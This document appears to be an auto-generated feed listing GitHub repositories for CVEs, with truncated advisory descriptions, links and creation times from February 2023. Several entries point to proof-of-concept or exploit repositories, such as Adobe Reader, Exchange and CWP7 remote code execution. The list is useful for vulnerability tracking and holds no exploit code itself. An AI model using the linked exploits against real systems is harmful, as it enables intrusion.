**A flaw was found where authconfig could configure sssd in a way that treats existing and non-existing logins differently, leaking information on existence of a user. An attacker with physical or network access to the machine could enumerate users via a timing attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7488](https://github.com/Live-Hack-CVE/CVE-2017-7488) create time: 2023-02-02T16:10:03Z

**A command injection flaw was found in the NetworkManager integration script included in the DHCP client packages in Red Hat Enterprise Linux. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1111](https://github.com/Live-Hack-CVE/CVE-2018-1111) create time: 2023-02-02T16:10:47Z

**A use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A use-after-free condition can occur when accessing the CreationDate property of the this.info object. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3962](https://github.com/Live-Hack-CVE/CVE-2018-3962) create time: 2023-02-02T16:09:41Z

**A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14892](https://github.com/Live-Hack-CVE/CVE-2019-14892) create time: 2023-02-02T16:09:37Z

**In ModSecurity before 2.9.6 and 3.x before 3.0.8, HTTP multipart requests were incorrectly parsed and could bypass the Web Application Firewall. NOTE: this is related to CVE-2022-39956 but can be considered independent changes to the ModSecurity (C language) codebase. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48279](https://github.com/Live-Hack-CVE/CVE-2022-48279) create time: 2023-02-02T16:09:57Z

**A program using FoundationNetworking in swift-corelibs-foundation is potentially vulnerable to CRLF ( ) injection in URLRequest headers. In this vulnerability, a client can insert one or several CRLF sequences into a URLRequest header value. When that request is sent via URLSession to an HTTP server, the server may int CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3918](https://github.com/Live-Hack-CVE/CVE-2022-3918) create time: 2023-02-02T16:09:48Z

**Redis is an in-memory database that persists on disk. Authenticated users issuing specially crafted `SETRANGE` and `SORT(_RO)` commands can trigger an integer overflow, resulting with Redis attempting to allocate impossible amounts of memory and abort with an out-of-memory (OOM) panic. The problem is fixed in Redis ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35977](https://github.com/Live-Hack-CVE/CVE-2022-35977) create time: 2023-02-02T16:09:45Z

**no description** : [duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC](https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC) create time: 2023-02-02T15:34:28Z

**Redis is an in-memory database that persists on disk. Authenticated users can issue a `HRANDFIELD` or `ZRANDMEMBER` command with specially crafted arguments to trigger a denial-of-service by crashing Redis with an assertion failure. This problem affects Redis versions 6.2 or newer up to but not including 6.2.9 as well CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22458](https://github.com/Live-Hack-CVE/CVE-2023-22458) create time: 2023-02-02T16:09:52Z

**PowerShell POC for CVE-2023-24055** : [ATTACKnDEFEND/CVE-2023-24055](https://github.com/ATTACKnDEFEND/CVE-2023-24055) create time: 2023-01-30T13:22:22Z

**An issue in mRemoteNG v1.76.20 allows attackers to escalate privileges via a crafted executable file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24307](https://github.com/Live-Hack-CVE/CVE-2020-24307) create time: 2023-02-02T13:57:38Z

**PrestaShop module, totadministrativemandate before v1.7.1 was discovered to contain a SQL injection vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46965](https://github.com/Live-Hack-CVE/CVE-2022-46965) create time: 2023-02-02T13:57:42Z

**Improper Handling of Additional Special Element in GitHub repository squidex/squidex prior to 7.4.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0643](https://github.com/Live-Hack-CVE/CVE-2023-0643) create time: 2023-02-02T13:57:50Z

**Cross-Site Request Forgery (CSRF) in GitHub repository squidex/squidex prior to 7.4.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0642](https://github.com/Live-Hack-CVE/CVE-2023-0642) create time: 2023-02-02T13:57:46Z

**Microsoft Exchange CVE-2021-26855&CVE-2021-27065** : [heikanet/Microsoft-Exchange-RCE](https://github.com/heikanet/Microsoft-Exchange-RCE) create time: 2023-02-02T13:20:45Z

**Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit** : [hacksysteam/CVE-2023-21608](https://github.com/hacksysteam/CVE-2023-21608) create time: 2023-01-30T12:57:48Z

**Active Debug Code vulnerability in robot controller of Mitsubishi Electric Corporation industrial robot MELFA SD/SQ Series and MELFA F-Series allows a remote unauthenticated attacker to gain unauthorized access by authentication bypass through an unauthorized telnet login. As for the affected model names, controller ty CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33323](https://github.com/Live-Hack-CVE/CVE-2022-33323) create time: 2023-02-02T11:49:22Z

**Authentication Bypass by Spoofing vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT27 model versions 01.14.000 to 01.47.000, Mitsubishi Electric Corporation GOT2000 Series GT25 model versions 01.14.000 to 01.47.000 and Mitsubishi Electric Corporation GT SoftGOT2000 versions 1.265B to 1.285X allows a re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40269](https://github.com/Live-Hack-CVE/CVE-2022-40269) create time: 2023-02-02T11:49:17Z

**Improper Restriction of Rendered UI Layers or Frames vulnerability in Mitsubishi Electric Corporation GOT2000 Series GT27 model versions 01.14.000 to 01.47.000, Mitsubishi Electric Corporation GOT2000 Series GT25 model versions 01.14.000 to 01.47.000 and Mitsubishi Electric Corporation GT SoftGOT2000 versions 1.265B to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40268](https://github.com/Live-Hack-CVE/CVE-2022-40268) create time: 2023-02-02T11:49:14Z

**The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2546](https://github.com/Live-Hack-CVE/CVE-2022-2546) create time: 2023-02-02T11:48:47Z

**A denial of service vulnerability exists in the malware scan functionality of ESTsoft Alyac 2.5.8.645. A specially-crafted PE file can lead to killing target process. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43665](https://github.com/Live-Hack-CVE/CVE-2022-43665) create time: 2023-02-02T11:48:44Z

**CVE-2022-46689** : [straight-tamago/FileSwitcherPro](https://github.com/straight-tamago/FileSwitcherPro) create time: 2023-01-26T19:52:30Z

**A vulnerability was found in PHPGurukul Employee Leaves Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file changepassword.php. The manipulation of the argument newpassword/confirmpassword leads to weak password requirements. The attack can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0641](https://github.com/Live-Hack-CVE/CVE-2023-0641) create time: 2023-02-02T11:49:10Z

**A vulnerability was found in TRENDnet TEW-652BRP 3.04b01. It has been classified as critical. Affected is an unknown function of the file ping.ccp of the component Web Interface. The manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0640](https://github.com/Live-Hack-CVE/CVE-2023-0640) create time: 2023-02-02T11:49:06Z

**A vulnerability was found in TRENDnet TEW-652BRP 3.04b01 and classified as problematic. This issue affects some unknown processing of the file get_set.ccp of the component Web Management Interface. The manipulation of the argument nextPage leads to cross site scripting. The attack may be initiated remotely. The associa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0639](https://github.com/Live-Hack-CVE/CVE-2023-0639) create time: 2023-02-02T11:49:02Z

**A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0638](https://github.com/Live-Hack-CVE/CVE-2023-0638) create time: 2023-02-02T11:48:59Z

**A vulnerability, which was classified as critical, was found in TRENDnet TEW-811DRU 1.0.10.0. This affects an unknown part of the file wan.asp of the component Web Management Interface. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the pub CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0637](https://github.com/Live-Hack-CVE/CVE-2023-0637) create time: 2023-02-02T11:48:55Z

**The protection bypass vulnerability in DLP for Windows 11.9.x is addressed in version 11.10.0. This allowed a local user to bypass DLP controls when uploading sensitive data from a mapped drive into a web email client. Loading from a local driver was correctly prevented. Versions prior to 11.9 correctly detected and bl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0400](https://github.com/Live-Hack-CVE/CVE-2023-0400) create time: 2023-02-02T11:48:51Z

**Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) (Unauthenticated)** : [ColdFusionX/CVE-2022-44877-CWP7](https://github.com/ColdFusionX/CVE-2022-44877-CWP7) create time: 2023-02-02T11:00:32Z

**no description** : [Kimorea/CVE-2020-27955-LFS](https://github.com/Kimorea/CVE-2020-27955-LFS) create time: 2023-02-02T09:28:33Z

**no description** : [Trinadh465/linux-4.1.15_CVE-2017-1000371](https://github.com/Trinadh465/linux-4.1.15_CVE-2017-1000371) create time: 2023-02-02T07:22:19Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3965](https://github.com/Live-Hack-CVE/CVE-2018-3965) create time: 2023-02-02T06:22:27Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3967](https://github.com/Live-Hack-CVE/CVE-2018-3967) create time: 2023-02-02T06:22:23Z

**An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader version 9.1.0.5096. A specially crafted PDF document can trigger a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user to open the malic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3966](https://github.com/Live-Hack-CVE/CVE-2018-3966) create time: 2023-02-02T06:22:20Z

**An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3890](https://github.com/Live-Hack-CVE/CVE-2018-3890) create time: 2023-02-02T06:22:16Z

**An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3934](https://github.com/Live-Hack-CVE/CVE-2018-3934) create time: 2023-02-02T06:22:12Z

**An exploitable code execution vulnerability exists in the UDP network functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can allocate unlimited memory, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3935](https://github.com/Live-Hack-CVE/CVE-2018-3935) create time: 2023-02-02T06:22:09Z

**An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted set of UDP packets can cause a settings change, resulting in denial of service. An attacker can send a set of packets to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3928](https://github.com/Live-Hack-CVE/CVE-2018-3928) create time: 2023-02-02T06:22:05Z

**An exploitable code execution vulnerability exists in the firmware update functionality of the Yi Home Camera 27US 1.8.7.0D. A specially crafted 7-Zip file can cause a CRC collision, resulting in a firmware update and code execution. An attacker can insert an SDcard to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3920](https://github.com/Live-Hack-CVE/CVE-2018-3920) create time: 2023-02-02T06:22:02Z

**An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3910](https://github.com/Live-Hack-CVE/CVE-2018-3910) create time: 2023-02-02T06:21:58Z

**An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability. Alternatively, a user could be con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3900](https://github.com/Live-Hack-CVE/CVE-2018-3900) create time: 2023-02-02T06:21:55Z

**An exploitable firmware downgrade vulnerability exists in the time syncing functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3892](https://github.com/Live-Hack-CVE/CVE-2018-3892) create time: 2023-02-02T06:21:51Z

**An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return addre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3899](https://github.com/Live-Hack-CVE/CVE-2018-3899) create time: 2023-02-02T06:21:48Z

**An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. The trans_info call can overwrite a buffer of size 0x104, which is more than enough to overflow the return addre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3898](https://github.com/Live-Hack-CVE/CVE-2018-3898) create time: 2023-02-02T06:21:44Z

**An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3891](https://github.com/Live-Hack-CVE/CVE-2018-3891) create time: 2023-02-02T06:21:41Z

**A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code executio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3888](https://github.com/Live-Hack-CVE/CVE-2018-3888) create time: 2023-02-02T06:21:37Z

**A memory corruption vulnerability exists in the PCX-parsing functionality of Computerinsel Photoline 20.53. A specially crafted PCX image processed via the application can lead to an out-of-bounds write, overwriting arbitrary data. An attacker can deliver a PCX image to trigger this vulnerability and gain code executio CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3887](https://github.com/Live-Hack-CVE/CVE-2018-3887) create time: 2023-02-02T06:21:22Z

**An exploitable out-of-bounds write exists in the TIFF-parsing functionality of Canvas Draw version 5.0.0. An attacker can deliver a TIFF image to trigger this vulnerability and gain code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3981](https://github.com/Live-Hack-CVE/CVE-2018-3981) create time: 2023-02-02T06:21:18Z

**IBM Tivoli Workload Automation for AIX (IBM Workload Scheduler 8.6, 9.1, 9.2, 9.3, and 9.4) contains directories with improper permissions that could allow a local user to with special access to gain root privileges. IBM X-Force ID: 138208. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1386](https://github.com/Live-Hack-CVE/CVE-2018-1386) create time: 2023-02-02T06:21:04Z

**make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19746](https://github.com/Live-Hack-CVE/CVE-2019-19746) create time: 2023-02-02T06:21:15Z

**A Cross-Site Scripting (XSS) vulnerability in the WebUI component of IP Office Application Server could allow unauthorized code execution and potentially disclose sensitive information. All product versions 11.x are affected. Product versions prior to 11.0, including unsupported versions, were not evaluated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-7004](https://github.com/Live-Hack-CVE/CVE-2019-7004) create time: 2023-02-02T06:21:11Z

**Zoho ManageEngine Applications Manager before 13620 allows a remote unauthenticated SQL injection via the SyncEventServlet eventid parameter to the SyncEventServlet.java doGet function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19649](https://github.com/Live-Hack-CVE/CVE-2019-19649) create time: 2023-02-02T06:21:08Z

**In Dovecot before 2.3.9.2, an attacker can crash a push-notification driver with a crafted email when push notifications are used, because of a NULL Pointer Dereference. The email must use a group address as either the sender or the recipient. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19722](https://github.com/Live-Hack-CVE/CVE-2019-19722) create time: 2023-02-02T06:21:01Z

**Clockwork Web before 0.1.2, when Rails before 5.2 is used, allows CSRF. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25015](https://github.com/Live-Hack-CVE/CVE-2023-25015) create time: 2023-02-02T06:20:56Z

**In dotCMS 5.x-22.06, it is possible to call the TempResource multiple times, each time requesting the dotCMS server to download a large file. If done repeatedly, this will result in Tomcat request-thread exhaustion and ultimately a denial of any other requests. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37034](https://github.com/Live-Hack-CVE/CVE-2022-37034) create time: 2023-02-02T01:50:09Z

**no description** : [imbas007/Atlassian-Bitbucket-CVE-2022-36804](https://github.com/imbas007/Atlassian-Bitbucket-CVE-2022-36804) create time: 2023-02-02T01:42:26Z

**Rapid7 Metasploit Pro versions 4.21.2 and lower suffer from a stored cross site scripting vulnerability, due to a lack of JavaScript request string sanitization. Using this vulnerability, an authenticated attacker can execute arbitrary HTML and script code in the target browser against another Metasploit Pro user using CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0599](https://github.com/Live-Hack-CVE/CVE-2023-0599) create time: 2023-02-02T01:50:12Z

**The Linux kernel through 6.1.9 has a Use-After-Free in bigben_remove in drivers/hid/hid-bigbenff.c via a crafted USB device because the LED controllers remain registered for too long. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25012](https://github.com/Live-Hack-CVE/CVE-2023-25012) create time: 2023-02-02T01:50:01Z

**In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22660](https://github.com/Live-Hack-CVE/CVE-2020-22660) create time: 2023-02-01T23:39:51Z

**In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22661](https://github.com/Live-Hack-CVE/CVE-2020-22661) create time: 2023-02-01T23:39:47Z

**In Ruckus R310 10.5.1.0.199, Ruckus R500 10.5.1.0.199, Ruckus R600 10.5.1.0.199, Ruckus T300 10.5.1.0.199, Ruckus T301n 10.5.1.0.199, Ruckus T301s 10.5.1.0.199, SmartCell Gateway 200 (SCG200) before 3.6.2.0.795, SmartZone 100 (SZ-100) before 3.6.2.0.795, SmartZone 300 (SZ300) before 3.6.2.0.795, Virtual SmartZone (vSZ) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-22662](https://github.com/Live-Hack-CVE/CVE-2020-22662) create time: 2023-02-01T23:39:44Z

**All versions of Landis+Gyr E850 (ZMQ200) are vulnerable to CWE-784: Reliance on Cookies Without Validation and Integrity. The device's web application navigation depends on the value of the session cookie. The web application could become inaccessible for the user if an attacker changes the cookie values. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3083](https://github.com/Live-Hack-CVE/CVE-2022-3083) create time: 2023-02-01T23:40:04Z

**Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is lower_transport_layer_on_seg. ¶¶ In Cypress Bluetooth Mesh SDK, there is an out-of-bound write vulnerabilit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31364](https://github.com/Live-Hack-CVE/CVE-2022-31364) create time: 2023-02-01T23:40:01Z

**Cypress : https://www.infineon.com/ Cypress Bluetooth Mesh SDK BSA0107_05.01.00-BX8-AMESH-08 is affected by: Buffer Overflow. The impact is: execute arbitrary code (remote). The component is: affected function is pb_transport_handle_frag_. ¶¶ In Cypress Bluetooth Mesh SDK, there is an out-of-bound write vulnerability t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31363](https://github.com/Live-Hack-CVE/CVE-2022-31363) create time: 2023-02-01T23:39:57Z

**In Bestechnic Bluetooth Mesh SDK (BES2300) V1.0, a buffer overflow vulnerability can be triggered during provisioning, because there is no check for the SegN field of the Transaction Start PDU. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30904](https://github.com/Live-Hack-CVE/CVE-2022-30904) create time: 2023-02-01T23:39:54Z

**maccms10 2021.1000.2000 is vulnerable to Server-side request forgery (SSRF). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47872](https://github.com/Live-Hack-CVE/CVE-2022-47872) create time: 2023-02-01T23:39:34Z

**An issue was discovered in dotCMS core 4.x through 22.10.2. An authenticated directory traversal vulnerability in the dotCMS API can lead to Remote Code Execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45783](https://github.com/Live-Hack-CVE/CVE-2022-45783) create time: 2023-02-01T23:39:30Z

**An issue was discovered in dotCMS core 5.3.8.5 through 5.3.8.15 and 21.03 through 22.10.1. A cryptographically insecure random generation algorithm for password-reset token generation leads to account takeover. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45782](https://github.com/Live-Hack-CVE/CVE-2022-45782) create time: 2023-02-01T23:39:26Z

**Rapid7 Nexpose and InsightVM versions 6.6.82 through 6.6.177 fail to validate the certificate of the update server when downloading updates. This failure could allow an attacker in a privileged position on the network to provide their own HTTPS endpoint, or intercept communications to the legitimate endpoint. The attac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3913](https://github.com/Live-Hack-CVE/CVE-2022-3913) create time: 2023-02-01T23:39:23Z

**In dotCMS 5.x-22.06, TempFileAPI allows a user to create a temporary file based on a passed in URL, while attempting to block any SSRF access to local IP addresses or private subnets. In resolving this URL, the TempFileAPI follows any 302 redirects that the remote URL returns. Because there is no re-validation of the r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37033](https://github.com/Live-Hack-CVE/CVE-2022-37033) create time: 2023-02-01T23:39:20Z

**An issue was discovered in Joomla! 4.0.0 through 4.2.4. A missing ACL check allows non super-admin users to access com_actionlogs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23751](https://github.com/Live-Hack-CVE/CVE-2023-23751) create time: 2023-02-01T23:39:40Z

**An issue was discovered in Joomla! 4.0.0 through 4.2.6. A missing token check causes a CSRF vulnerability in the handling of post-installation messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23750](https://github.com/Live-Hack-CVE/CVE-2023-23750) create time: 2023-02-01T23:39:37Z

**In the macho_parse_file functionality in macho/macho.c of YARA 3.11.0, command_size may be inconsistent with the real size. A specially crafted MachO file can cause an out-of-bounds memory access, resulting in Denial of Service (application crash) or potential code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19648](https://github.com/Live-Hack-CVE/CVE-2019-19648) create time: 2023-02-01T21:28:50Z

**An issue was discovered in lib\cdt\dttree.c in libcdt.a in graphviz 2.40.1. Stack consumption occurs because of recursive agclose calls in lib\cgraph\graph.c in libcgraph.a, related to agfstsubg in lib\cgraph\subg.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-9904](https://github.com/Live-Hack-CVE/CVE-2019-9904) create time: 2023-02-01T21:28:32Z

**fmt_mtm_load_song in fmt/mtm.c in Schism Tracker 20190722 has a heap-based buffer overflow. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-14465](https://github.com/Live-Hack-CVE/CVE-2019-14465) create time: 2023-02-01T21:28:29Z

**IBM Planning Analytics 2.0.0 through 2.0.8 is vulnerable to a configuration overwrite that allows an unauthenticated user to login as "admin", and then execute code as root or SYSTEM via TM1 scripting. IBM X-Force ID: 172094. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4716](https://github.com/Live-Hack-CVE/CVE-2019-4716) create time: 2023-02-01T21:28:22Z

**kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46934](https://github.com/Live-Hack-CVE/CVE-2022-46934) create time: 2023-02-01T21:29:01Z

**A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47073](https://github.com/Live-Hack-CVE/CVE-2022-47073) create time: 2023-02-01T21:28:43Z

**Authenticated denial of service CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27507](https://github.com/Live-Hack-CVE/CVE-2022-27507) create time: 2023-02-01T21:28:18Z

**Unauthenticated denial of service CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27508](https://github.com/Live-Hack-CVE/CVE-2022-27508) create time: 2023-02-01T21:28:14Z

**IBM Business Automation Workflow 22.0.2 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 239427. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43864](https://github.com/Live-Hack-CVE/CVE-2022-43864) create time: 2023-02-01T21:28:03Z

**An issue was discovered in Rawchen blog-ssm v1.0 allows an attacker to obtain sensitive user information by bypassing permission checks via the /adminGetUserList component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40036](https://github.com/Live-Hack-CVE/CVE-2022-40036) create time: 2023-02-01T21:28:00Z

**IBM WebSphere Application Server 8.5 and 9.0 traditional container uses weaker than expected cryptographic keys that could allow an attacker to decrypt sensitive information. This affects only the containerized version of WebSphere Application Server traditional. IBM X-Force ID: 241045. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43917](https://github.com/Live-Hack-CVE/CVE-2022-43917) create time: 2023-02-01T21:27:56Z

**File Upload Vulnerability found in Rawchen Blog-ssm v1.0 allowing attackers to execute arbitrary commands and gain escalated privileges via the /uploadFileList component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40035](https://github.com/Live-Hack-CVE/CVE-2022-40035) create time: 2023-02-01T21:27:52Z

**GLPI is a Free Asset and IT Management Software package. Versions 10.0.0 and above, prior to 10.0.6, are subject to Cross-site Scripting. An administrator may store malicious code in help links. This issue is patched in 10.0.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41941](https://github.com/Live-Hack-CVE/CVE-2022-41941) create time: 2023-02-01T21:27:49Z

**The Kraken.io Image Optimizer plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.6.8. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to reset image optimizations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0619](https://github.com/Live-Hack-CVE/CVE-2023-0619) create time: 2023-02-01T21:29:05Z

**In Django 3.2 before 3.2.17, 4.0 before 4.0.9, and 4.1 before 4.1.6, the parsed values of Accept-Language headers are cached in order to avoid repetitive parsing. This leads to a potential denial-of-service vector via excessive memory usage if the raw value of Accept-Language headers is very large. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23969](https://github.com/Live-Hack-CVE/CVE-2023-23969) create time: 2023-02-01T21:28:57Z

